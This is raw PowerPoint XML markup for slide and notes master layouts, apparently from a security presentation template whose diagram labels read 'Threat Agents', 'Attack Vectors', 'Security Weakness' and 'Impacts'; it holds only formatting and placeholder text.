            <a:ext cx="3170238" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106319" tIns="53159" rIns="106319" bIns="53159" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{46C0059F-706E-42AF-B504-DA4BA04161AF}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>21.10.2017</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9120190"/>
            <a:ext cx="3170238" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106319" tIns="53159" rIns="106319" bIns="53159" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Foliennummernplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143375" y="9120190"/>
            <a:ext cx="3170238" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106319" tIns="53159" rIns="106319" bIns="53159" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{91832A97-7139-43D2-8F8B-094A116E151F}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="943245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3"/>
            <a:ext cx="3169921" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143590" y="3"/>
            <a:ext cx="3169921" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/21/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2308225" y="720725"/>
            <a:ext cx="2698750" cy="3598863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582"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115165" tIns="57582" rIns="115165" bIns="5758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6"/>
            <a:ext cx="3169921" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143590" y="9119476"/>
            <a:ext cx="3169921" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115165" tIns="57582" rIns="115165" bIns="57582" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="656740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2</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5318423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3</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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8467203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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1233767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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="571452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5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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3200" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter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5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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4A1647"/>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534000" y="108000"/>
            <a:ext cx="252000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="25400" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="none"/>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="54000" tIns="45720" rIns="54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rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="4A1647"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1105299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9" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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4A1647"/>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr userDrawn="1">
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741469646"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957457"/>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a:solidFill>
                          <a:schemeClr val="bg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a:solidFill>
                          <a:schemeClr val="bg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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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b="1">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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>?</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endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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endParaRPr lang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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6" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3168000"/>
            <a:ext cx="3383280" cy="315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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3168000"/>
            <a:ext cx="3383280" cy="315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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534000" y="108000"/>
            <a:ext cx="252000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="25400" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="none"/>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="54000" tIns="45720" rIns="54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rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="4A1647"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Gruppieren 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="46590" y="1058047"/>
            <a:ext cx="6049410" cy="390006"/>
            <a:chOff x="46590" y="1058047"/>
            <a:chExt cx="6049410" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="46590" y="1058047"/>
              <a:ext cx="6049410" cy="386519"/>
              <a:chOff x="46590" y="1070390"/>
              <a:chExt cx="6049410" cy="386519"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1070390"/>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00" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105375"/>
                <a:ext cx="139700" cy="305289"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28"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a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29"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30"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31"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32"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a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="46590" y="1073624"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1143000"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Vectors</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>           Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="23" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="20" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1981200" y="1257554"/>
                <a:ext cx="838200" cy="4864"/>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22" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="20" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="685800" y="1256471"/>
                <a:ext cx="457200" cy="1083"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 52974"/>
                </a:avLst>
              </a:prstGeom>
